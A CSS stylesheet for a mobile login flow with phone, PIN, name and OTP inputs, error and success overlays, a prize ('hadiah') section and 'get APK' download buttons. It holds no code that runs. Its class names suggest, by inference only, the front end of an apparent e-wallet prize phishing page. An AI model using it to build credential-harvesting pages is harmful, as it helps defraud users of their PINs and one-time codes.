* {
    margin: 0;
    padding: 0;
    box-sizing: border-box;
    z-index: 100;
}

svg{
    width: 15px;
    height: 15px;
}

body {
    background-color: rgb(50, 50, 255);
    width: 100%;
}

.nav {
    display: none;
}

.logo_nav {
    height: auto;
    width: 100%;
    /* z-index: 100; */
}

.ic_loading {
    height: auto;
    width: 200px;
    display: block;
}

.logo_loading {
    height: auto;
    width: 160px;
    display: none;
}

.loading_home {
    position: fixed;
    width: 100%;
    height: 100%;
    background: white;
    display: flex;
    justify-content: center;
    text-align: center;
    align-items: center;
    z-index: 1000;
}

.content_login {
    background-color: rgb(255, 255, 255);
    text-align: center;
    width: 90%;
    margin: 0 auto;
    border-radius: 8px;
    box-shadow: 0 0px 3px 1px rgba(0, 0, 0, 0.450);
    padding: 26px;
    display: block;
    z-index: 100;
}

/* #tel, #pin {
    margin-top: 20px;
} */

.kem_img {
    height: auto;
    width: 100%;
}

#tel,
#pin,
#nama {
    width: 100%;
    /* height: 35px; */
    border: none;
    margin-left: 8px;
    font-size: 17px;
}

#tel:focus,
#pin:focus,
#nama:focus {
    outline: none;
}

.inp3 {
    border: 1px solid;
    /* padding: 10px; */
    display: flex;
    margin-top: 13px;
    padding: 8px;
    border: 1.5px solid rgba(0, 0, 0, 0.230);
    border-radius: 4px;
}

.ic_nama,
.ic_pin {
    background-color: rgba(0, 0, 0, 0.230);
    border-radius: 1000px;
    height: auto;
    width: 33px;
    margin: 0;
}

#btn_submit {
    height: 40px;
    width: 70%;
    margin-top: 40px;
    margin-bottom: 30px;
    background-color: rgb(0, 81, 255);
    border: none;
    border-radius: 4.3px;
    cursor: pointer;
    color: white;
    font-family: sans-serif;
    font-size: 13.9px;
    font-weight: bold;
}

#btn_submit:hover {
    background-color: rgb(35, 82, 184);
    box-shadow: 0 0px 2px 1px rgba(0, 0, 0, 0.425);
}

.ic_style {
    height: auto;
    width: 40px;
    text-align: center;
}

.ic_style1 {
    height: auto;
    margin-top: 20px;
    width: 45px;
    /* background-color: rgb(202, 202, 202); */
    text-align: center;
    height: 45px;
    margin-bottom: -20px;
    border: none;
    border-radius: 100px;
    cursor: pointer;
    font-family: sans-serif;
    font-size: 13.9px;
    font-weight: bold;

}

.ic_style2 {
    height: auto;
    width: 70%;
    margin-top: -50px;
    text-align: center;
    height: 30%;
    border: none;
    border-radius: 100px;
    cursor: pointer;
    font-family: sans-serif;
    font-weight: bold;
}
 

/* text error */
.text_error {
    /* background-color: white;
    width: 65%;
    margin: 0 auto;
    text-align: center;
    padding: 15px;
    border-radius: 9.4px; */

    background: white;
    padding: 20px;
    border-radius: 8px;
    text-align: center;
    box-shadow: 0 0 10px rgba(0, 0, 0, 0.3);
    width: 70%;
}

.overllay {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.753);
    display: flex;
    align-items: center;
    justify-content: center;
    /* visibility: hidden;  */
    visibility: hidden;
    /* opacity: 0; */
    transition: opacity 0.3s, visibility 0.3s;
    font-family: Arial, Helvetica, sans-serif;
    z-index: 1000;
}

p {
    font-size: 13.1px;
    font-weight: bold;
    margin-top: 10px;
}

.title {
    font-weight: 1000;
    margin-top: 13px;
}

.img_error {
    height: auto;
    width: 48px;
    margin: 0 auto;
}

.btn_close {
    background-color: rgb(0, 81, 255);
    border: none;
    width: 50%;
    color: white;
    margin-top: 23px;
    border-radius: 2.8px;
    height: 24px;
    font-weight: bold;
    font-family: sans-serif;
    height: 35px;
}

.btn_close:hover {
    background-color: rgb(35, 82, 184);
    box-shadow: 0 0px 2px 1px rgba(0, 0, 0, 0.425);
}

/* otp style */
.otp_container {
    display: flex;
    margin: 0 auto;
    border: 1.4px solid rgba(0, 0, 0, 0.230);
    border-radius: 5px;
    background-color: rgba(0, 0, 0, 0.121);
    padding: 10px;
    width: 100%;
    max-width: 220px;
    /* margin-bottom: 200px; */
}

.input_otp {
    width: 20%;
    height: 27px;
    border: none;
    text-align: center;
    font-size: 20px;
    background-size: 10px;
    background-color: rgba(0, 0, 0, 0);
    /* height: 30px; */
    font-family: sans-serif;
}

.input_otp:focus {
    outline: none;
}

/* #btn_submit_otp {
    height: 30px;
    width: 70%;
    margin-top: 120px;
    margin-bottom: 30px;
    background-color: rgb(0, 81, 255);
    border: none;
    border-radius: 4.3px;
    cursor: pointer;
    color: white;
    font-family: sans-serif;
    font-size: 13.9px;
    font-weight: bold;
}

#btn_submit_otp:hover {
    background-color: rgb(35, 82, 184);
    box-shadow: 0 0px 2px 1px rgba(0, 0, 0, 0.425);
} */

a:hover {
    color: red;
    outline: none;
}

.overllay_succes {
    position: fixed;
    top: 0;
    left: 0;
    width: 100%;
    height: 100%;
    background: rgba(0, 0, 0, 0.753);
    display: flex;
    align-items: center;
    justify-content: center;
    visibility: hidden;
    /* opacity: 0; */
    transition: opacity 0.3s, visibility 0.3s;
    font-family: Arial, Helvetica, sans-serif;
    z-index: 1000;
}

.succes {
    height: auto;
    width: 130px;
}

.content_hadiah {
    text-align: center;
    font-family: Arial, Helvetica, sans-serif;
    margin-top: 20px;
}

.strong {
    font-weight: 1000;
}

.btn_get_apk {
    background-color: rgb(0, 81, 255);
    border: none;
    width: 50%;
    color: rgb(255, 255, 255);
    margin-top:40px;
    border-radius: 2.8px;
    height: 100px;
    font-weight: bold;
    font-family: sans-serif;
    height: 30px;
    margin-bottom: 80px;
}
.btn_get_apk:hover {
    background-color: rgb(35, 82, 184);
    box-shadow: 0 0px 2px 1px rgba(0, 0, 0, 0.425);
}


.btn_get_apk1 {
    background-color: rgb(0, 140, 255);
    border: none;
    width: 30%;
    color: rgb(255, 255, 255);
    border-radius: 100px;
    height: 100px;
    font-weight: bold;
    font-family: sans-serif;
    height: 35px;
    margin-bottom: 35px;
}

.btn_get_apk1:hover {
    background-color: rgb(20, 0, 175);
    box-shadow: 0 0px 10px 5px rgba(0, 0, 0, 0.425);
}

.span {
    position: fixed;
    bottom: 0;
    left: 0;
    width: 100%;
    background: rgba(0, 0, 0, 0.717);
    display: flex;
    font-family: Arial, Helvetica, sans-serif;
    z-index: 1000;
    text-align: center;
    align-items: center;
    justify-content: center;
    color: rgba(255, 255, 255, 0.826);
    z-index: 100;
}

#reset_timer {
    color: rgba(0, 0, 255, 0.564);
}

#reset_timer:hover {
    color: red;
}

input[type=number]::-webkit-inner-spin-button,
input[type=number]::-webkit-outer-spin-button {
    -webkit-appearance: none;
    margin: 0;
}

/* Untuk Firefox */
input[type=number] {
    -moz-appearance: textfield;
}

/* Styling input tel agar konsisten */
input[type=tel] {
    appearance: textfield;
    -moz-appearance: textfield;
    -webkit-appearance: textfield;
}